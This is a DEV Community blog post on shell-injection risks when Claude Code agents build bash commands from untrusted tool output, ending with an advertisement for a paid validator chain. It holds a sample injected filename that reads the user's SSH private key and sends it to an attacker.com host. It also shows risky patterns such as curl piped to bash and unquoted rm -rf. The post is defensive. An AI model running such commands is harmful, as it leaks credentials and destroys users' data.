DEV Community

~K¹yle Million
~K¹yle Million

Posted on

Claude Code Shell Access Is a Security Risk. Here's the Architecture That Fixes It.

#claudecode #security #devtools #aiagents

When you give a Claude Code agent exec access, you're giving an AI model the ability to run shell commands on your machine.

Not shell commands you typed. Shell commands it assembled — from tool outputs, web content, files it read, messages it received, variables that arrived from external sources you don't control.

Most operators understand this abstractly. Fewer think carefully about what that surface looks like when the agent is running autonomously at 2am.

How Agents Assemble Shell Commands

The injection surface is structural. Claude Code assembles shell commands by interpolating variables into strings:

# The agent wants to process a filename
filename=$(get_from_tool_result)
rm -rf "$filename"
Enter fullscreen mode Exit fullscreen mode

What happens when get_from_tool_result returns .; cat ~/.ssh/id_rsa | curl https://attacker.com?

Without validation, the command executes. The agent didn't intend this. The operator didn't intend this. But the shell didn't care about intent — it ran what it was given.

This is bash injection. It's not theoretical. It's the expected outcome of any agent that assembles shell strings from untrusted input without a validation layer.

The Top 5 Shell Failure Patterns

1. rm -rf with unquoted variable

rm -rf $target_dir  # if $target_dir is empty or contains spaces, this is catastrophic
Enter fullscreen mode Exit fullscreen mode

2. curl piped to bash

curl $url | bash  # executes whatever is at that URL, no preview, no validation
Enter fullscreen mode Exit fullscreen mode

3. sudo without path anchoring

sudo $command  # if $command was assembled from external input, sudo runs it with root
Enter fullscreen mode Exit fullscreen mode

4. Chained operators that bypass intent

$safe_command && $next_step  # if $safe_command is `true` injected from external input, anything runs
Enter fullscreen mode Exit fullscreen mode

5. Wildcard expansion in destructive contexts

rm logs/*.log  # if the working directory changed, this deletes the wrong logs directory
Enter fullscreen mode Exit fullscreen mode

None of these require the attacker to break into your system. They require the agent to receive crafted input — from a web scrape, a file it reads, an API response — and assemble it into a shell string.

Why Pre-Execution Validation Is the Only Real Fix

The instinct is to be careful. Read the tool results before executing. Add instructions to validate inputs. This works until it doesn't — until the agent is mid-session, operating at depth, and receives input it doesn't recognize as crafted.

The fix that works is a pre-execution pipeline: every shell command the agent wants to run passes through a validation chain before execution. One failure in the chain = full abort. The command never runs.

The chain doesn't trust the agent's judgment. It validates structurally, the same way every time, regardless of how confident the agent sounds.

What the 19-Validator Chain Looks Like

A production pre-execution validator chain covers these categories:

  1. Injection prevention — detects metacharacter patterns, command substitution, pipeline injection
  2. Path validation — anchors all file operations to allowed directories, rejects traversal
  3. Privilege escalation detection — blocks sudo, su, chmod +s, setuid without explicit authorization
  4. Destructive operation guards — intercepts rm -rf, dd, mkfs, format operations
  5. Network operation controls — validates curl/wget targets, blocks pipe-to-bash patterns
  6. Variable expansion safety — requires quoting, rejects unquoted expansions in dangerous contexts
  7. Zsh-specific traps — five additional checks for Zsh behavior that bash-only validators miss

Every command passes all 19. One failure = full abort + log entry. No partial execution.

The Free Version and the Full Architecture

Agent Bash Safety — Why Your Agent Is a Security Risk is free. It's the threat model: the injection surface, the top failure patterns, the validator concept. Read it and decide whether you need the full chain.

The full pre-execution pipeline — all 19 validators in sequence, fail-fast abort logic, dangerous command pattern library, Zsh compatibility layer, logging spec — is in Bash Security Validator ($19).

Drop it into your agent. It runs before every exec call.

Shell Safety Is Not the Only Production Gap

Unguarded shell execution is one of three failure modes that compound in production Claude Code deployments. An agent in a context death spiral during a bash-heavy task loses track of what commands it already ran — and may run them again. A runaway loop with exec access burns tokens and makes tool calls.

The guard for each reinforces the others. The Production Agent Ops bundle ($69) includes all three — Bash Security Validator, Agent Compaction Architecture, and Loop Termination Architecture — with a guide covering how they interact.

By @thebrierfox | From production Claude Code deployments on IntuiTek¹ infrastructure

Top comments (0)